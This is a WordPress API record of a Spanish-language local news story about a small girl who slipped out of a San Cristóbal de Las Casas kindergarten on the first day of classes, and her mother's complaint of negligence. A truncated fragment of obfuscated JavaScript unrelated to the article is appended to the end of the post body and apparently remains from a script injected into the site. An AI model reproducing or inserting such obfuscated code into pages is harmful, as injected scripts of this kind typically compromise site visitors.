{"id":17489,"date":"2024-08-27T04:46:48","date_gmt":"2024-08-27T04:46:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17489"},"modified":"2024-08-27T04:46:49","modified_gmt":"2024-08-27T04:46:49","slug":"denuncia-negligencia-en-jardin-de-ninos-tras-escape-nina","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17489","title":{"rendered":"Denuncia negligencia en jard\u00edn de ni\u00f1os tras escape ni\u00f1a"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240826-WA0075.jpg\" alt=\"\" class=\"wp-image-17490\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240826-WA0075.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240826-WA0075-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>26 de agosto del 2024. San Crist\u00f3bal de Las Casas.- El primer d\u00eda de clases en el jard\u00edn de ni\u00f1os Ana Eboli Paniagua se convirti\u00f3 en una pesadilla para una madre de familia, luego de que su hija, una peque\u00f1a de corta edad, sali\u00f3 del plantel sin que el personal se diera cuenta. El incidente, que r\u00e1pidamente se viraliz\u00f3 en redes sociales, ha desatado indignaci\u00f3n y preocupaci\u00f3n por la seguridad en las escuelas.<\/p>\n\n\n\n<p>Seg\u00fan la madre de la menor, la ni\u00f1a se sali\u00f3 por la puerta trasera del kinder y fue encontrada en el parque del Cerrillo, a varios metros de la instituci\u00f3n.<\/p>\n\n\n\n<p>&#8220;Yo quiero hacer responsable a la directora y al personal de la escuela porque no pusieron atenci\u00f3n. Dicen que es la primera vez que pasa, pero quien la encontr\u00f3 agradezco que la hayan llevado de regreso. Mi hija estaba circulando en redes sociales y no estaba en su escuela&#8221;, declar\u00f3 la madre en una entrevista.<\/p>\n\n\n\n<p>La situaci\u00f3n se complic\u00f3 cuando el personal del jard\u00edn de ni\u00f1os, al que la menor pertenec\u00eda, inicialmente neg\u00f3 que la ni\u00f1a fuera alumna del plantel, lo que gener\u00f3 mayor angustia en la madre.<\/p>\n\n\n\n<p>&#8220;No la reconocieron porque dijeron que se llevaran sin uniforme. Me enter\u00e9 a trav\u00e9s de las redes sociales, no me llamaron de la escuela, marqu\u00e9 y no me contestaron. Hoy es el primer d\u00eda de clases y no hay medidas de seguridad, la seguridad de las puertas debe ser primordial&#8221;, agreg\u00f3.<\/p>\n\n\n\n<p>La denuncia tambi\u00e9n se hizo p\u00fablica a trav\u00e9s del perfil de Facebook &#8220;Morena Sirena&#8221;, donde una ciudadana relat\u00f3 c\u00f3mo encontr\u00f3 a la ni\u00f1a corriendo y llorando en la calle. &#8220;Le reclam\u00e9 a la directora que c\u00f3mo era posible que la ni\u00f1a estuviera en la calle, pero solo se limit\u00f3 a enojarse y a molestarse. Solo piensen qu\u00e9 clase de maestras y directora tiene este kinder&#8221;, escribi\u00f3 en su publicaci\u00f3n.<\/p>\n\n\n\n<p>Por su parte, la Polic\u00eda Municipal inform\u00f3 que los hechos ocurrieron alrededor de las 8:50 horas. La madre, al enterarse de la situaci\u00f3n por redes sociales, solicit\u00f3 apoyo para realizar la denuncia correspondiente, siendo trasladada a la Fiscal\u00eda de Distrito Altos para deslindar responsabilidades.<\/p>\n\n\n\n<p>Este incidente ha generado un llamado urgente a reforzar las medidas de seguridad en las escuelas, especialmente en los jardines de ni\u00f1os, para garantizar la protecci\u00f3n de los menores. La madre de la peque\u00f1a exige que no se descuiden las puertas y que se tomen las acciones necesarias para evitar que este tipo de situaciones se repitan.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 26 de agosto del 2024. San Crist\u00f3bal de Las Casas.- El primer d\u00eda de clases en el jard\u00edn de ni\u00f1os Ana Eboli Paniagua se convirti\u00f3 en una pesadilla para una madre de familia, luego de que su hija, una peque\u00f1a de corta edad, sali\u00f3 del plantel sin que el personal se diera &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17490,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17489","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17489","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17489"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17489\/revisions"}],"predecessor-version":[{"id":17491,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17489\/revisions\/17491"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17490"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17489"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17489"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17489"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}